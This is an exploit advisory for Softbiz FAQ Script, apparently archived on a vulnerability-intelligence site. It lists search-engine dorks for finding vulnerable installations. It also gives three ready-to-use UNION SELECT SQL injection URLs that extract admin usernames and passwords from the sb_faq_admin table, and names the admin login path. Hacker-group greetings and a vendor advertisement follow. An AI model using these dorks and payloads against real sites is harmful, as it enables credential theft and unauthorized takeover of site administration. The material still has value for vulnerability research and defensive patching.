Lucene search
softbizfaq-sql.txt
Softbiz FAQ Script has multiple SQL injection vulnerabilities allowing unauthorized access to admin data.
Show more
`|___________________________________________________|
|
| Softbiz FAQ Script Multiple SQL Injection Vulnerability
|
|___________________________________________________
|--------------------IQ-Security--------------------|
|
| Author: Hussin X
|
| Home : WwW.IQ-TY.CoM | wWw.TrYaG.cC
|
| email: darkangel_g85[at]Yahoo[DoT]com
|
|
|___________________________________________________
| |
|
| script : http://www.softbizscripts.com
|
| DorK : inurl:"faq_qanda.php?id="
| DorK : inurl:"index.php?cid="
| DorK : inurl: "print_article.php?id="
|___________________________________________________|
Exploit:
________
www.[target].com/Script/faq_qanda.php?id=-1+union+select+null,null,concat_ws(0x3a,adminname,adminpwd),null,null,null,null,null,null,null,null,null+from+sb_faq_admin--
2
www.[target].com/Script/index.php?cid=-1+union+select+null,concat_ws(0x3a,adminname,adminpwd),null,null+from+sb_faq_admin--
3
www.[target].com/Script/print_article.php?id=-1+union+select+null,null,concat_ws(0x3a,adminname,adminpwd),null,null,null,null,null,null,null,null,null+from+sb_faq_admin--
Login :
www.[target].com/Script/admin/
____________________________( Greetz )_________________________________
|
| IQ-Security > WwW.IQ-TY.CoM | wWw.TrYaG.cC
|
| My friends : DeViL iRaQ | IRAQ DiveR | IRAQ_JAGUR | CraCkEr
|
| Ghost Hacker | FAHD | Iraqihack | jiko | str0ke | Cyber-Zone
|______________________________________________________________________
Im IRAQi
`
Transform Your Security Services
Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.
Book a live demo23 Sep 2008 00:00Current
7.4High risk
Vulners AI Score7.4